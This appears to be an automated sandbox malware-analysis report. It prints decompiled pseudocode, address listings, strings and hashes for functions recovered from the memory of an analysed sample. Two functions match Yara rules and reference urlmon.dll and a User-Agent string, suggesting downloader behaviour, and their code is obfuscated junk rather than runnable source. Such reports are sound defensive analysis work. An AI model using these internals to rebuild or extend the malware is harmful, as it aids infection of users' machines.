				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E00FF1B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E00FF1B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E00FF1B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E00FF1B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E00FF1B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L01004620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E0102F3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E01031370(_t276, 0xfc4e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E0102BB40(0,  &_v68, _t170);
									if(L00FF43C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E0102BB40(_t257,  &_v68, _t243);
								if(L00FF43C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E01031370(_t278, 0xfc4e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L01004620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E0102F3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E01031370(_v16, 0xfc4e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E0102BB40(_t262,  &_v68, _t244);
								if(L00FF43C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E01031370(_t282, 0xfc4e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E0102BB40(_t262,  &_v68, _t201);
							if(L00FF43C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L01004620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E0102F3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E01031370(_t280, 0xfc4e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E0102BB40(_t267,  &_v68, _t245);
							if(L00FF43C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E01031370(_t284, 0xfc4e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E0102BB40(_t267,  &_v68, _t224);
						if(L00FF43C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}










































                          0x00ff3d3c
                          0x00ff3d42
                          0x00ff3d44
                          0x00ff3d46
                          0x00ff3d49
                          0x00ff3d4c
                          0x00ff3d4f
                          0x00ff3d52
                          0x00ff3d55
                          0x00ff3d58
                          0x00ff3d5b
                          0x00ff3d5f
                          0x00ff3d61
                          0x00ff3d66
                          0x01048213
                          0x01048218
                          0x00ff4085
                          0x00ff4088
                          0x00ff408e
                          0x00ff4094
                          0x00ff409a
                          0x00ff40a0
                          0x00ff40a6
                          0x00ff40a9
                          0x00ff40af
                          0x00ff40b6
                          0x00ff40bd
                          0x00ff40bd
                          0x00ff3d83
                          0x0104821f
                          0x01048229
                          0x01048238
                          0x01048238
                          0x0104823d
                          0x0104823d
                          0x00ff3da0
                          0x00ff3daf
                          0x00ff3db5
                          0x00ff3dba
                          0x00ff3dba
                          0x00ff3dd4
                          0x00ff3e94
                          0x00ff3eab
                          0x00ff3f6d
                          0x00ff3f84
                          0x00ff406b
                          0x00ff406b
                          0x00ff406e
                          0x00ff406e
                          0x00ff4070
                          0x00ff4074
                          0x01048351
                          0x01048351
                          0x00ff407a
                          0x00ff407f
                          0x0104835d
                          0x01048370
                          0x01048377
                          0x01048379
                          0x0104837c
                          0x0104837c
                          0x0104835d
                          0x00000000
                          0x00ff407f
                          0x00ff3f8a
                          0x00ff3f8d
                          0x00ff3f90
                          0x00ff3f95
                          0x0104830d
                          0x0104830f
                          0x00ff3f9b
                          0x00ff3fac
                          0x00ff3fae
                          0x00ff3fb1
                          0x00ff3fb1
                          0x00ff3fb6
                          0x01048317
                          0x0104831a
                          0x00000000
                          0x00ff3fbc
                          0x00ff3fc1
                          0x00ff3fc9
                          0x00ff3fd7
                          0x00ff3fda
                          0x00ff3fdd
                          0x00ff4021
                          0x00ff4021
                          0x00ff4029
                          0x00ff4030
                          0x00ff4044
                          0x00ff4046
                          0x00ff4046
                          0x00ff4044
                          0x00ff4049
                          0x01048327
                          0x01048334
                          0x01048339
                          0x0104833c
                          0x00ff404f
                          0x00ff404f
                          0x00ff404f
                          0x00ff4051
                          0x00ff4056
                          0x00ff4063
                          0x00ff4063
                          0x00ff4068
                          0x00000000
                          0x00ff4068
                          0x00ff3fdf
                          0x00ff3fe2
                          0x00ff3fe4
                          0x00ff3fe7
                          0x00ff3fef
                          0x00ff4003
                          0x00ff4005
                          0x00ff4005
                          0x00ff400c
                          0x00ff4013
                          0x00ff4016
                          0x00ff4017
                          0x00ff401b
                          0x00ff401e
                          0x00000000
                          0x00ff401e
                          0x00ff3fb6
                          0x00ff3eb1
                          0x00ff3eb4
                          0x00ff3eb7
                          0x00ff3ebc
                          0x010482a9
                          0x010482ab
                          0x00ff3ec2
                          0x00ff3ed3
                          0x00ff3ed5
                          0x00ff3ed8
                          0x00ff3ed8
                          0x00ff3edd
                          0x010482b3
                          0x010482b6
                          0x00000000
                          0x00ff3ee3
                          0x00ff3ee8
                          0x00ff3eed
                          0x00ff3ef0
                          0x00ff3ef3
                          0x00ff3f02
                          0x00ff3f05
                          0x00ff3f08
                          0x010482c0
                          0x010482c3
                          0x010482c5
                          0x010482c8
                          0x010482d0
                          0x010482e4
                          0x010482e6
                          0x010482e6
                          0x010482ed
                          0x010482f4
                          0x010482f7
                          0x010482f8
                          0x010482fc
                          0x010482ff
                          0x010482ff
                          0x00ff3f0e
                          0x00ff3f11
                          0x00ff3f16
                          0x00ff3f1d
                          0x00ff3f31
                          0x01048307
                          0x01048307
                          0x00ff3f31
                          0x00ff3f39
                          0x00ff3f48
                          0x00ff3f4d
                          0x00ff3f50
                          0x00ff3f50
                          0x00ff3f53
                          0x00ff3f58
                          0x00ff3f65
                          0x00ff3f65
                          0x00ff3f6a
                          0x00000000
                          0x00ff3f6a
                          0x00ff3edd
                          0x00ff3dda
                          0x00ff3ddd
                          0x00ff3de0
                          0x00ff3de5
                          0x01048245
                          0x00ff3deb
                          0x00ff3df7
                          0x00ff3dfc
                          0x00ff3dfe
                          0x00ff3e01
                          0x00ff3e01
                          0x00ff3e06
                          0x0104824d
                          0x0104824f
                          0x01048254
                          0x00000000
                          0x00ff3e0c
                          0x00ff3e11
                          0x00ff3e16
                          0x00ff3e19
                          0x00ff3e29
                          0x00ff3e2c
                          0x00ff3e2f
                          0x0104825c
                          0x0104825f
                          0x01048261
                          0x01048264
                          0x0104826c
                          0x01048280
                          0x01048282
                          0x01048282
                          0x01048289
                          0x01048290
                          0x01048293
                          0x01048294
                          0x01048298
                          0x0104829b
                          0x0104829b
                          0x00ff3e35
                          0x00ff3e38
                          0x00ff3e3d
                          0x00ff3e44
                          0x00ff3e58
                          0x010482a3
                          0x010482a3
                          0x00ff3e58
                          0x00ff3e60
                          0x00ff3e6f
                          0x00ff3e74
                          0x00ff3e77
                          0x00ff3e77
                          0x00ff3e7a
                          0x00ff3e7f
                          0x00ff3e8c
                          0x00ff3e8c
                          0x00ff3e91
                          0x00000000
                          0x00ff3e91

                          Strings
                          • Kernel-MUI-Language-SKU, xrefs: 00FF3F70
                          • Kernel-MUI-Language-Disallowed, xrefs: 00FF3E97
                          • Kernel-MUI-Language-Allowed, xrefs: 00FF3DC0
                          • Kernel-MUI-Number-Allowed, xrefs: 00FF3D8C
                          • WindowsExcludedProcs, xrefs: 00FF3D6F
                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                          • API String ID: 0-258546922
                          • Opcode ID: 7bcd747d3b62aa2f75bac80be247be58ce68ed77ea71b60fdf01942f0d3bfb32
                          • Instruction ID: 59592607ab2095f4872ee66d0649f6aece3986748f00292c47ce0f1b97d3c131
                          • Opcode Fuzzy Hash: 7bcd747d3b62aa2f75bac80be247be58ce68ed77ea71b60fdf01942f0d3bfb32
                          • Instruction Fuzzy Hash: 1BF15DB2D00219EBCB15DF98C980AEEBBF9FF48750F14406AE645E7261D734AE01DB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 004157D8, Relevance: 6.4, Strings: 5, Instructions: 141COMMON
                          Download Yara Rule
                          C-Code - Quality: 33%
                          			E004157D8(signed int __eax, void* __ecx, signed int __edx, void* __fp0) {
				signed int _t36;
				signed int _t41;
				signed char _t43;
				signed char _t48;
				signed char _t49;
				signed char _t51;
				void* _t55;
				signed char _t60;
				signed int _t61;
				signed int _t66;
				void* _t73;

				_t55 = __ecx;
				if((__edx &  *(_t73 + __ecx + 0x26)) == 0) {
					_t36 = __eax ^ 0x542b733e;
					__eflags = _t36;
					if(__eflags >= 0) {
						_push(_t66);
						__eflags = 0;
						_push(_t60);
						_t61 =  *(_t73 + 0xc);
						 *((intOrPtr*)(_t73 - 0x19)) = 0;
						 *((char*)(_t73 - 0x15)) = 0;
						goto L27;
					} else {
						asm("adc dl, dl");
						goto L22;
					}
				} else {
					asm("les ebp, [ebx]");
					_t17 = __eax;
					__eax = __esp;
					__esp = _t17;
					__eflags = __al - 0xa4;
					__al =  *0xa4cf642b;
					asm("movsb");
					__ah = 0xce;
					__ebx = 0xc7707ee;
					if(__eflags > 0) {
						L27:
						goto L29;
					} else {
						__esp = __esp + 1;
						_push(__ecx);
						__eax = __eax + 1;
						__eflags = __eax;
						asm("a16 add eax, 0xb69a140");
						asm("scasw");
						asm("ficomp word [ebp+0x13]");
						if(__eflags == 0) {
							while(1) {
								L7:
								asm("out 0x73, al");
								while(__eflags > 0) {
									__eflags = __eax & 0x9372fc31;
									_t13 = __eax;
									__eax = __edx;
									__edx = _t13;
									__bh = __bh +  *((intOrPtr*)(__edx + 0x1dbec823));
									__eflags = __bh;
									__esp = __esp + 1;
									_push(ds);
									asm("adc [esi], cl");
									_push(__ecx);
									_push(__ecx);
									asm("sti");
									asm("faddp st1, st0");
									if(__eflags > 0) {
										continue;
									} else {
										asm("das");
										if(__eflags < 0) {
											L22:
											asm("ror byte [ebx], cl");
											_t43 = _t60;
											_t61 = _t36;
											_t23 = _t73 + 0x7f6cb721;
											 *_t23 =  *(_t73 + 0x7f6cb721) + _t55;
											__eflags =  *_t23;
											goto L23;
										} else {
											_push(ss);
											__bh = __bh |  *__ecx;
											__eflags = __bh;
											if(__eflags >= 0) {
												goto L18;
											} else {
												asm("scasd");
												 *0x529d6c8a = __eax;
												__al = __al - 0xcc;
												asm("cmpsd");
												__eflags = __esp - __edi;
												if(__eflags >= 0) {
													_push(__ebx);
													_push(__edi);
													__ebx = __ebx + 1;
													__ebx = __ebx - 1;
													asm("enter 0x90ab, 0xfe");
													asm("o16 jge 0x7e");
													__dl = 0xe6;
													__edx = __edx - 1;
													__eflags = __edx;
													_t5 = __edx - 0x618a279f;
													_t6 = __ah;
													__ah =  *_t5;
													 *_t5 = _t6;
												} else {
													 *[cs:ebx+0x72fc0a61] = __dh;
													asm("into");
													asm("pushad");
													_t15 = __eax - 0x6678bb3c;
													_t16 = __dl;
													__dl =  *_t15;
													 *_t15 = _t16;
													_pop(ss);
													asm("enter 0x3aa, 0xa1");
													asm("out dx, eax");
												}
												asm("popad");
												__fp0 = __fp0 /  *(__ebp - 0x62);
												__edx =  *(__esi + __edx * 8) * 0x3b;
												__edx = __edx - 1;
												__edi = 0xf5f30346;
												__esi = __ebx;
												asm("retf");
												_t10 = __eax;
												__eax = __ecx;
												__ecx = _t10;
												asm("int3");
												goto L7;
											}
										}
									}
									goto L33;
								}
								_t3 = __ebp - 0x73;
								 *_t3 =  *(__ebp - 0x73) << 0x56;
								__eflags =  *_t3;
							}
						} else {
							__bh = __bh + __al;
							asm("adc al, 0xb1");
							__dh = 0xa0;
							asm("sbb cl, [esp+ecx*8+0x53]");
							asm("repne mov esp, edi");
							__al = __al ^ 0x0000006d;
							asm("jecxz 0xffffffa7");
							__ebx = 0x9a0bfea9;
							asm("stc");
							__edx = __eax * 0x9a0bfea9 >> 0x20;
							__eflags = __eax;
							L18:
							L23:
							if(__eflags > 0) {
								 *_t43 =  *_t43 & _t43;
								_push(ss);
								 *((intOrPtr*)(_t43 + _t55 - 1)) =  *((intOrPtr*)(_t43 + _t55 - 1)) + _t43 + _t55 - 1;
								_t33 = _t73 - 0x24; // 0x6d6c7275
								__eflags =  *((intOrPtr*)(_t73 + 8)) + 0xc94;
								_t66 = E00413E50( *((intOrPtr*)(_t73 + 8)) + 0xc94, E00409B40( *((intOrPtr*)(_t73 + 8)) + 0xc94,  *((intOrPtr*)(_t73 + 8)) + 0xc94, _t33), 0, 0, 0x69767207);
								L29:
								asm("lock add esp, 0x28");
								__eflags = _t66;
								if(_t66 == 0) {
									L32:
									__eflags = 0;
									return 0;
								} else {
									_t41 =  *_t66(0, E0041A390(_t61) + _t61, _t73 - 4);
									__eflags = _t41;
									if(_t41 != 0) {
										goto L32;
									} else {
										return 1;
									}
								}
							} else {
								_t48 = _t51;
								__eflags = _t48 & 0x69453e52;
								asm("outsd");
								_t49 = _t48 &  *(_t43 - 0x68);
								__eflags = _t49;
								asm("arpl [eax-0x19cfcce5], di");
								asm("loopne 0x32");
								return _t49;
							}
						}
					}
				}
				L33:
			}














                          0x004157d8
                          0x004157dc
                          0x00415824
                          0x00415824
                          0x00415825
                          0x00415856
                          0x00415857
                          0x00415859
                          0x0041585a
                          0x0041585d
                          0x00415860
                          0x00000000
                          0x00415828
                          0x00415829
                          0x00000000
                          0x00415829
                          0x004157de
                          0x004157de
                          0x004157e0
                          0x004157e0
                          0x004157e0
                          0x004157e1
                          0x004157e3
                          0x004157e8
                          0x004157e9
                          0x004157eb
                          0x004157f0
                          0x00415862
                          0x00000000
                          0x004157f2
                          0x004157f2
                          0x004157f3
                          0x004157f5
                          0x004157f5
                          0x004157f6
                          0x004157fc
                          0x004157fe
                          0x00415801
                          0x0041578a
                          0x0041578a
                          0x0041578a
                          0x0041578c
                          0x0041578e
                          0x00415793
                          0x00415793
                          0x00415793
                          0x00415794
                          0x00415794
                          0x0041579a
                          0x0041579b
                          0x0041579c
                          0x0041579e
                          0x0041579f
                          0x004157a0
                          0x004157a1
                          0x004157a3
                          0x00000000
                          0x004157a5
                          0x004157aa
                          0x004157ab
                          0x0041582a
                          0x0041582a
                          0x0041582d
                          0x0041582d
                          0x0041582e
                          0x0041582e
                          0x0041582e
                          0x00000000
                          0x004157ad
                          0x004157ad
                          0x004157ae
                          0x004157ae
                          0x004157b0
                          0x00000000
                          0x004157b2
                          0x004157b2
                          0x004157b3
                          0x004157b8
                          0x004157ba
                          0x004157bb
                          0x004157bd
                          0x00415763
                          0x00415764
                          0x00415765
                          0x00415769
                          0x0041576a
                          0x0041576e
                          0x00415771
                          0x00415773
                          0x00415773
                          0x00415774
                          0x00415774
                          0x00415774
                          0x00415774
                          0x004157bf
                          0x004157bf
                          0x004157c6
                          0x004157c7
                          0x004157c8
                          0x004157c8
                          0x004157c8
                          0x004157c8
                          0x004157cf
                          0x004157d0
                          0x004157d4
                          0x004157d4
                          0x00415776
                          0x00415777
                          0x0041577a
                          0x0041577f
                          0x00415780
                          0x00415785
                          0x00415787
                          0x00415788
                          0x00415788
                          0x00415788
                          0x00415789
                          0x00000000
                          0x00415789
                          0x004157b0
                          0x004157ab
                          0x00000000
                          0x004157a3
                          0x00415737
                          0x00415737
                          0x00415737
                          0x00415737
                          0x00415803
                          0x00415803
                          0x00415805
                          0x00415807
                          0x00415809
                          0x0041580d
                          0x00415810
                          0x00415813
                          0x00415815
                          0x0041581a
                          0x0041581b
                          0x0041581b
                          0x0041581c
                          0x00415833
                          0x00415833
                          0x004158a2
                          0x004158a6
                          0x004158a8
                          0x004158ad
                          0x004158b1
                          0x004158cd
                          0x004158ce
                          0x004158ce
                          0x004158d2
                          0x004158d4
                          0x004158f9
                          0x004158fa
                          0x00415900
                          0x004158d6
                          0x004158e8
                          0x004158ea
                          0x004158ec
                          0x00000000
                          0x004158ee
                          0x004158f8
                          0x004158f8
                          0x004158ec
                          0x00415835
                          0x00415835
                          0x00415836
                          0x0041583b
                          0x0041583c
                          0x0041583c
                          0x0041583f
                          0x00415845
                          0x0041584f
                          0x0041584f
                          0x00415833
                          0x00415801
                          0x004157f0
                          0x00000000

                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.433824497.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: Us$: $er-A$gent$urlmon.dll
                          • API String ID: 0-1367105278
                          • Opcode ID: c50e0972d9e3c02eed6ba0cfdbe988fcfbf0fd886face38cd78a50e529f4ecf2
                          • Instruction ID: d35fe0e56d5b213ec2a307e6804696366d35cc18aa5b3103ee1b1b76edd744e7
                          • Opcode Fuzzy Hash: c50e0972d9e3c02eed6ba0cfdbe988fcfbf0fd886face38cd78a50e529f4ecf2
                          • Instruction Fuzzy Hash: 0741BC72805644EEDB01DE519D427EFBFB8EB85724F18001AEC00AB341D33D899687DA
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 004157AA, Relevance: 6.4, Strings: 5, Instructions: 108COMMON
                          Download Yara Rule
                          C-Code - Quality: 39%
                          			E004157AA(void* __eax, signed char __ebx, void* __ecx, void* __edx, signed char __edi, void* __esi, void* __eflags, void* __fp0) {
				signed char _t26;
				signed int _t34;
				signed char _t36;
				signed int _t37;
				signed char _t39;
				void* _t43;
				void* _t48;
				signed int _t56;
				void* _t61;

				L0:
				while(1) {
					L0:
					_t43 = __ecx;
					_t39 = __ebx;
					asm("das");
					if(__eflags < 0) {
						break;
					}
					L11:
					_push(ss);
					__bh = __bh |  *__ecx;
					__eflags = __bh;
					if(__eflags >= 0) {
						L14:
						L16:
						if(__eflags > 0) {
							L18:
							 *_t26 =  *_t26 & _t26;
							_push(ss);
							 *((intOrPtr*)(_t26 + _t43 - 1)) =  *((intOrPtr*)(_t26 + _t43 - 1)) + _t26 + _t43 - 1;
							_t23 = _t61 - 0x24; // 0x6d6c7275
							__eflags =  *((intOrPtr*)(_t61 + 8)) + 0xc94;
							_t56 = E00413E50( *((intOrPtr*)(_t61 + 8)) + 0xc94, E00409B40( *((intOrPtr*)(_t61 + 8)) + 0xc94,  *((intOrPtr*)(_t61 + 8)) + 0xc94, _t23), 0, 0, 0x69767207);
							L19:
							asm("lock add esp, 0x28");
							__eflags = _t56;
							if(_t56 == 0) {
								L22:
								__eflags = 0;
								return 0;
							} else {
								L20:
								_t34 =  *_t56(0, E0041A390(_t48) + _t48, _t61 - 4);
								__eflags = _t34;
								if(_t34 != 0) {
									goto L22;
								} else {
									L21:
									return 1;
								}
							}
						} else {
							L17:
							_t36 = _t39;
							__eflags = _t36 & 0x69453e52;
							asm("outsd");
							_t37 = _t36 &  *(_t26 - 0x68);
							__eflags = _t37;
							asm("arpl [eax-0x19cfcce5], di");
							asm("loopne 0x32");
							return _t37;
						}
					} else {
						L12:
						asm("scasd");
						 *0x529d6c8a = __eax;
						__al = __al - 0xcc;
						asm("cmpsd");
						__eflags = __esp - __edi;
						if(__eflags >= 0) {
							_push(__ebx);
							_push(__edi);
							__ebx = __ebx + 1;
							__ebx = __ebx - 1;
							asm("enter 0x90ab, 0xfe");
							asm("o16 jge 0x7e");
							__dl = 0xe6;
							__edx = __edx - 1;
							__eflags = __edx;
							_t3 = __edx - 0x618a279f;
							_t4 = __ah;
							__ah =  *_t3;
							 *_t3 = _t4;
						} else {
							 *[cs:ebx+0x72fc0a61] = __dh;
							asm("into");
							asm("pushad");
							_t13 = __eax - 0x6678bb3c;
							_t14 = __dl;
							__dl =  *_t13;
							 *_t13 = _t14;
							_pop(ss);
							asm("enter 0x3aa, 0xa1");
							asm("out dx, eax");
						}
						L5:
						asm("popad");
						__fp0 = __fp0 /  *(__ebp - 0x62);
						__edx =  *(__esi + __edx * 8) * 0x3b;
						__edx = __edx - 1;
						__edi = 0xf5f30346;
						__esi = __ebx;
						asm("retf");
						_t8 = __eax;
						__eax = __ecx;
						__ecx = _t8;
						asm("int3");
						L7:
						asm("out 0x73, al");
						L8:
						while(__eflags > 0) {
							__eflags = __eax & 0x9372fc31;
							_t11 = __eax;
							__eax = __edx;
							__edx = _t11;
							__bh = __bh +  *((intOrPtr*)(__edx + 0x1dbec823));
							__eflags = __bh;
							__esp = __esp + 1;
							_push(ds);
							asm("adc [esi], cl");
							_push(__ecx);
							_push(__ecx);
							asm("sti");
							asm("faddp st1, st0");
							if(__eflags > 0) {
								continue;
							} else {
								L10:
								goto L0;
							}
							goto L23;
						}
						_t1 = __ebp - 0x73;
						 *_t1 =  *(__ebp - 0x73) << 0x56;
						__eflags =  *_t1;
					}
					L23:
				}
				L15:
				asm("ror byte [ebx], cl");
				_t26 = __edi;
				_t48 = __eax;
				_t16 = _t61 + 0x7f6cb721;
				 *_t16 =  *(_t61 + 0x7f6cb721) + __ecx;
				__eflags =  *_t16;
				goto L16;
			}












                          0x004157aa
                          0x004157aa
                          0x004157aa
                          0x004157aa
                          0x004157aa
                          0x004157aa
                          0x004157ab
                          0x00000000
                          0x00000000
                          0x004157ad
                          0x004157ad
                          0x004157ae
                          0x004157ae
                          0x004157b0
                          0x0041581c
                          0x00415833
                          0x00415833
                          0x004158a2
                          0x004158a2
                          0x004158a6
                          0x004158a8
                          0x004158ad
                          0x004158b1
                          0x004158cd
                          0x004158ce
                          0x004158ce
                          0x004158d2
                          0x004158d4
                          0x004158f9
                          0x004158fa
                          0x00415900
                          0x004158d6
                          0x004158d6
                          0x004158e8
                          0x004158ea
                          0x004158ec
                          0x00000000
                          0x004158ee
                          0x004158ee
                          0x004158f8
                          0x004158f8
                          0x004158ec
                          0x00415835
                          0x00415835
                          0x00415835
                          0x00415836
                          0x0041583b
                          0x0041583c
                          0x0041583c
                          0x0041583f
                          0x00415845
                          0x0041584f
                          0x0041584f
                          0x004157b2
                          0x004157b2
                          0x004157b2
                          0x004157b3
                          0x004157b8
                          0x004157ba
                          0x004157bb
                          0x004157bd
                          0x00415763
                          0x00415764
                          0x00415765
                          0x00415769
                          0x0041576a
                          0x0041576e
                          0x00415771
                          0x00415773
                          0x00415773
                          0x00415774
                          0x00415774
                          0x00415774
                          0x00415774
                          0x004157bf
                          0x004157bf
                          0x004157c6
                          0x004157c7
                          0x004157c8
                          0x004157c8
                          0x004157c8
                          0x004157c8
                          0x004157cf
                          0x004157d0
                          0x004157d4
                          0x004157d4
                          0x00415776
                          0x00415776
                          0x00415777
                          0x0041577a
                          0x0041577f
                          0x00415780
                          0x00415785
                          0x00415787
                          0x00415788
                          0x00415788
                          0x00415788
                          0x00415789
                          0x0041578a
                          0x0041578a
                          0x00000000
                          0x0041578c
                          0x0041578e
                          0x00415793
                          0x00415793
                          0x00415793
                          0x00415794
                          0x00415794
                          0x0041579a
                          0x0041579b
                          0x0041579c
                          0x0041579e
                          0x0041579f
                          0x004157a0
                          0x004157a1
                          0x004157a3
                          0x00000000
                          0x004157a5
                          0x004157a5
                          0x00000000
                          0x004157a5
                          0x00000000
                          0x004157a3
                          0x00415737
                          0x00415737
                          0x00415737
                          0x00415737
                          0x00000000
                          0x004157b0
                          0x0041582a
                          0x0041582a
                          0x0041582d
                          0x0041582d
                          0x0041582e
                          0x0041582e
                          0x0041582e
                          0x00000000

                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.433824497.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: Us$: $er-A$gent$urlmon.dll
                          • API String ID: 0-1367105278
                          • Opcode ID: a6a268fcff0022dcd6bbb2e67d09aca66b1db5f4ffe4c1056632d4187e793186
                          • Instruction ID: feac6a233371933784746111ca5c46658fd243908eca285433ab50e9c318133f
                          • Opcode Fuzzy Hash: a6a268fcff0022dcd6bbb2e67d09aca66b1db5f4ffe4c1056632d4187e793186
                          • Instruction Fuzzy Hash: 1C317A36949B949EDB129E919841BEEBF35DF92714F04008BD4406F281C3685E82C79A
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 01018E00, Relevance: 5.1, Strings: 4, Instructions: 126COMMON
                          Download Yara Rule
                          C-Code - Quality: 44%
                          			E01018E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0x10dd360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0x10d8464; // 0x74790110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
